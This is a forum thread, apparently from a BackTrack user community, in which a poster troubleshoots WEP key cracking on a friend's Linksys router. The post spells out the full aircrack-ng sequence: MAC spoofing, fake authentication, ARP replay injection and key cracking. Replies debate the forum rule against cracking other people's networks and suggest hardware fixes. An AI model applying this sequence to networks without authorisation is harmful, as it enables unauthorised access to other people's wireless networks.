i am confused over this one, i have managed to break my homehub without any difficulty, however, when i was trying to emulate this at my friends house when i send the "aireplay-ng -0 1" etc i get the authenticaton and assosiation requests sent, however, i cannot get association. Therefore, is there anypoint using the aireplay-ng -3 attack to capture ARPs?
I don't understand it, i'm right next to the router yet no assosiation my method works just not here.
Well, I am using a Toshiba Sat Pro A100 with a Orinoco gold 8470-wd and what is an older version of BT (as for some reason the newer ones detect my card but i cannot detect APs)
The commands are fairly basic:
let's call my router "homehub" and its bssid 22:33:44:55:44:33 on channel 11
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
Ctrl + C (so i can copy the AP)
aireplay-ng -1 0 -e homehub -a 22:33:44:55:44:33 -h 00:11:22:33:44:55 ath0
this is where i usually get assosication, however with my friends Linksys WRT54GL (UK) doesn't give association.
airodump-ng -w homehub -c 11 ath0
aireplay-ng -3 -x 100 -n 100000 -b 22:33:44:55:44:33 -h 00:11:22:33:44:55 ath0
once i get enough AP's IV's whatever:
aircrack-ng -n 128 homehub-01.cap
That method worked fine on my router, any ideas?
sorry about the lack of info previously
"That method worked fine on my router, any ideas?
sorry about the lack of info previously"
so this one is not yours ? if so .... dash off !! READ FORUM RULES.....DO NOT POST ON CRACKING NETS THAT DON'T BELONG TO YOU......
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Is the expressed consent of the router's owner unacceptable then? Although it may appear that i am attempting to crack someone elses router, I assure you this is genuine and the owner of the router in question is in fact beside me. I know better than to break the forum rules. If you are not satisifed with that I can give you all of the relevant serial numbers, stuff you can't find by cracking it. Do you have anything useful to add?
on the aircrack site there is a tutuorial for clientless wep cracking. in it there is a set of commands for picky access points. Futhermore it also says "Tough Shit" sometimes the attack won't work. Gee, I hope that was usefull.
not exactly what I wanted to hear, but thanks anyway.
had the same prob. solved with the help of a big antenna and a strong wifi-card... remember that you have to reach the access point! this is not allways possible even if you can catch the packets :-) after that i had success with the mentioned video-tutorial...
That shouldn't be a issue since he has permision and is right next to it.